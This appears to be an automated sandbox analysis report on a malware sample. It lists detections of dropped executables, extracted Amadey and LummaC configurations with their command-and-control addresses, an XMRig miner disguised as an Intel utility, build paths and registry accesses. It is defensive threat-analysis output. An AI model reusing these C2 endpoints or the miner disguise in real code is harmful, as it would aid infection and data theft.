Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\dwVrTdy[1].exe	Avira: detection malicious, Label: TR/AD.Nekark.eiqyn
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Avira: detection malicious, Label: TR/AD.Nekark.eiqyn
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\t5abhIx[1].exe	Avira: detection malicious, Label: TR/AD.Nekark.eiqyn
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\H9TU4oY[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\ZiYbk6W[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Found malware configuration

Source: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: b1dc05533c.exe.7004.13.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["print-vexer.biz", "dwell-exclaim.biz", "se-blurry.biz", "impend-differ.biz", "covery-mover.biz", "formy-spill.biz", "drive-connect.cyou", "zinc-sneark.biz", "dare-curbys.biz"], "Build id": "FATE99--test"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\C1J7SVw[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\t5abhIx[1].exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\wOKhy9f[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\94CwbGg[1].exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\K6UAlAU[1].exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\dwVrTdy[1].exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AzVRM7c[1].exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[3].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\1015193001\K6UAlAU.exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Temp\1015216001\wOKhy9f.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1015305001\94CwbGg.exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\1015364001\b2d27d0fa4.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1015365001\82bc687fc3.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\1015366001\dce9e93496.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	ReversingLabs: Detection: 70%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 47%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AzVRM7c[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\wOKhy9f[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\dwVrTdy[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\K6UAlAU[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\t5abhIx[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\H9TU4oY[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\ZiYbk6W[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000002.269554816675.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.269554816675.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.269556564358.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.269556913458.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 1488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7840, type: MEMORYSTR

Found strings related to Crypto-Mining

Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe

Unpacked PE file: 48.2.Bxq1jd2.exe.400000.0.unpack

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Google\Chrome\Extensions
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\graph
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\graph\graph.exe
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI85002\wheel-0.43.0.dist-info\LICENSE.txt

Source:	Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_asyncio.pdb source: LoaderClient.exe, 0000002E.00000003.269781086691.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_multiprocessing.pdb source: LoaderClient.exe, 0000002E.00000003.269783180111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\select.pdb source: LoaderClient.exe, 0000002E.00000003.269799420971.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269901766931.00007FFBE1BC3000.00000002.00000001.01000000.0000001D.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win-amd64-3.10\Release\win32trace.pdb source: LoaderClient.exe, 0000002E.00000003.269801841133.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: dwVrTdy.exe, 00000026.00000003.269623319835.0000022434342000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648198814.00000256362AF000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000002A.00000002.269645091434.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002A.00000000.269623648243.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002C.00000000.269648966759.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000000.269753453267.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40630000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269890200730.00007FFBB373C000.00000002.00000001.01000000.00000040.sdmp
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: LoaderClient.exe, 0000002E.00000003.269784461654.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: LoaderClient.exe, 0000002F.00000002.269891937465.00007FFBB399F000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\python3.pdb source: LoaderClient.exe, 0000002E.00000003.269792403014.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269878316296.00000178E9C30000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: LoaderClient.exe, 0000002E.00000003.269780776101.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win-amd64-3.10\Release\_win32sysloader.pdb source: LoaderClient.exe, 0000002E.00000003.269785646619.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: LoaderClient.exe, 0000002E.00000003.269784263111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_overlapped.pdb source: LoaderClient.exe, 0000002E.00000003.269783360100.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: LoaderClient.exe, 0000002E.00000003.269781338858.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269900030970.00007FFBE131D000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: LoaderClient.exe, 0000002E.00000003.269782686037.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269899355718.00007FFBE12F6000.00000002.00000001.01000000.00000025.sdmp
Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: dwVrTdy.exe, 00000026.00000003.269623319835.0000022434342000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648198814.00000256362AF000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000002A.00000002.269645091434.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002A.00000000.269623648243.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002C.00000000.269648966759.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000000.269753453267.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: LoaderClient.exe, 0000002F.00000002.269891937465.00007FFBB399F000.00000002.00000001.01000000.00000026.sdmp

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
